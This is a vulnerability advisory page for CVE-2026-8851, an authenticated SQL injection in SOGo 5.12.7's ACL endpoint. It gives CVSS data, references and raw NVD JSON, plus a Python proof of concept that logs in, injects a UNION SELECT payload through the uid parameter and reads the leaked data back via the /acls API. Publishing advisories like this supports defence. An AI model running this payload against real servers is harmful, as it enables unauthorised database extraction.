CVE-2026-8851

Description

SOGo 5.12.7 contains a SQL injection vulnerability in the Access Control List management functionality that allows authenticated users to extract arbitrary data from the database by injecting SQL subqueries through the uid parameter of the addUserInAcls endpoint. Attackers can inject malicious SQL code to write extracted data into the sogo_acl table and retrieve it through the /acls API, establishing an out-of-band data exfiltration channel.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

SOGo <= 5.12.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target configuration target_url = "https://sogo-example.com/SOGo" username = "[email protected]" password = "password" session = requests.Session() # 1. Authenticate login_payload = { "userName": username, "password": password, "domain": "example.com", "language": "en", "theme": "default" } session.post(f"{target_url}/connect", data=login_payload) # 2. Exploit SQL Injection in addUserInAcls # The uid parameter is vulnerable. We inject a subquery to extract data. # Example: Extract version() into the sogo_acl table. malicious_uid = "test' UNION SELECT NULL, version(), NULL, NULL, NULL-- -" exploit_url = f"{target_url}/acl/addUserInAcls" payload = { "uid": malicious_uid, "folder": "personal/test_user" } response = session.post(exploit_url, data=payload) if response.status_code == 200: print("[+] SQL Injection payload sent successfully.") # 3. Retrieve injected data via /acls API # The data written to sogo_acl can now be read acl_url = f"{target_url}/acls" acl_response = session.get(acl_url) print("[+] Checking for leaked data in ACL response:") if "PostgreSQL" in acl_response.text or "mysql" in acl_response.text: print(acl_response.text) else: print("Data not found directly, check database manually.") else: print(f"[-] Exploit failed. Status code: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8851
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8851
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8851/
[4] VulDB https://vuldb.com/cve/CVE-2026-8851
[5] https://github.com/Alinto/sogo/releases/tag/SOGo-5.12.8
[6] https://www.sogo.nu/news/2026/sogo-v5128-released.html
[7] https://www.vulncheck.com/advisories/sogo-sql-injection-via-adduserinacls-endpoint

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8851", "sourceIdentifier": "[email protected]", "published": "2026-05-18T21:16:41.777", "lastModified": "2026-05-18T21:16:41.777", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOGo 5.12.7 contains a SQL injection vulnerability in the Access Control List management functionality that allows authenticated users to extract arbitrary data from the database by injecting SQL subqueries through the uid parameter of the addUserInAcls endpoint. Attackers can inject malicious SQL code to write extracted data into the sogo_acl table and retrieve it through the /acls API, establishing an out-of-band data exfiltration channel."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/Alinto/sogo/releases/tag/SOGo-5.12.8", "source": "[email protected]"}, {"url": "https://www.sogo.nu/news/2026/sogo-v5128-released.html", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/sogo-sql-injection-via-adduserinacls-endpoint", "source": "[email protected]"}]}}